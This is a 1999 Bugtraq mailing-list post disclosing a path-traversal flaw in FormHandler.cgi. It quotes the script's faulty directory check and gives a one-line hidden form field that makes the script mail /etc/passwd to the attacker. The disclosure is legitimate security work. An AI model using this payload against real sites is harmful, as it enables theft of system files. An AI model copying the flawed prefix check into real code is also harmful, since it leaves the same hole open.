Bugtraq mailing list archives

Re: FormHandler.cgi

From: marcys () FREE COM PL (m4rcyS)
Date: Tue, 16 Nov 1999 16:46:33 +0100


On Fri, 12 Nov 1999, Mnemonix wrote:

A quick search of the databases didn't show anything about this particular problem though the principle is well 
recognised as an issue:

FormHandler.cgi available from http://www.cgi-perl.com/programs/FormHandler
uses hard coded physical paths for templates etc so it's possible to get sensitive files like /etc/passwd by 
modifying a site's form and submitting it.

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix/
Cerberus Information Security
+44(0)181 661 7405


Yeah, Matt's scripts security is a legend ;) Concrete example
(formhandler.cgi v2.0) - you can download ANY file which user nobody has
read perms to by attaching it to reply mail. Piece'o'code:

@ALLOWED_ATTACH_DIRS = ('all');         # hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]

if (&valid_directory($filename)) {      # let's check if file is allowed
push(@files, $filename); [...] }        # to send
[...]

sub valid_directory {
    local ($filename) = $_[0];
    local ($allowed_path, $restricted_path);
    local($valid_dir) = 0;
    if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
    else {
        foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
            $valid_dir = ($filename =~ /^$allowed_path/);      # silly ...
            last if $valid_dir;
        }
    }
    foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
        $valid_dir = ($filename !~ /^$restricted_path/);       # once more
        last if !$valid_dir;
    }
    return $valid_dir;
}
[...]

How to d/l /etc/passwd ? Just add this to the form:
<INPUT TYPE="hidden" NAME="reply_message_attach"
VALUE="text:/tmp/../etc/passwd">

... and voila, now wait for /etc/passwd to come to your mailbox.
You can do exactly the same if @ALLOWED_ATTACH_DIRS is not set to
"all". Trivial, isn't it ?

It's just a one little sample of Matt's code. I think that we all have
seen enough examples of his creativity. This topic can become a
never-ending-story . Aleph, what do you think about killing every thread
with "Matt" and "CGI" keywords in topic ? ;))

greetz,
____________________________________________________________
                              m4rcyS

                   email: marcys () free com pl, m () sh pl

"I think there is a world market for maybe five computers."
                     - Thomas Watson, chairman of IBM, 1943
------------------------------------------------------------

Current thread:

F5 Networks Security Advisory (fwd) Gwendolynn ferch Elydyr (Nov 10)
- Re: F5 Networks Security Advisory (fwd) pedward () WEBCOM COM (Nov 10)
  - Re: F5 Networks Security Advisory (fwd) Mike Johnson (Nov 11)
    - Re: F5 Networks Security Advisory (fwd) pedward () WEBCOM COM (Nov 11)
    - FormHandler.cgi Mnemonix (Nov 11)
    - Re: FormHandler.cgi m4rcyS (Nov 16)
    - hping2 antirez () INVECE ORG (Nov 16)
  - Re: F5 Networks Security Advisory (fwd) Rogier Wolff (Nov 12)